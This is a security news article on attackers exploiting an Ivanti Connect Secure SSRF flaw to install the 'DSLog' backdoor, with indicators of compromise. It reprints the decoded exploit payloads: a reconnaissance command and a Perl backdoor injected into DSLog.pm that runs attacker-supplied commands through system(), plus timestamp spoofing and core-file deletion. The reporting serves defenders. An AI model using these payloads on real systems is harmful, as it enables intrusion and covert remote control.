Hackers Exploiting Ivanti SSRF flaw to Inject DSLog Malware


Ivanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High). 

In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.

Document

Live Account Takeover Attack Simulation

Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks

.


Hackers Exploiting Ivanti SSRF Flaw

According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.

Initial request

During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.

Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.

http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname –
a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.

Backdoor Installation

Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:

http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw /
DESTFILE=”/home/perl/DSLog.pm”
CLFILE=”/home/perl/DSLogMB.pm”
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then
echo ‘OK’;
else
sed -i ‘102i\ my $ua = $ENV{HTTP_USER_AGENT};n my $req =
$ENV{QUERY_STRING};n my $qur =
”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7”;n my @param =
split(/&/, $req);n if (index($ua, $qur) != -1) {n if ($param[1]){n my @res = split(/=/,
$param[1]);n if ($res[0] eq ”cdi”){n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;n
$res[1] =~ tr/!-~/P-~!-O/;n system(${res[1]});n }n }n }’ $DESTFILE
fi
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
/bin/bash;
Decoded backdoor command (Source: Orange Cyber Defense)

This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.

Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.

Indicators of Compromise

Host-based IoC

Path + filename  Hash  Description
/root/home/perl/DSLog[.]pm N/A – varies  Legitimate DSLog Log module embedding the
/root/home/webserver/htdocs/danana/imgs/index[.]txt N/A – varies  backdoor
/root/home/webserver/htdocs/danana/imgs/index1[.]txt N/A – varies  Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/index2[.]txt N/A – varies  Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/logo[.]png Embedding the result of ‘uname -a’

Network-based IoC

Network Indicator  Type Description
159.65.123.122 IP Address Massive exploitation activity

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.





Source link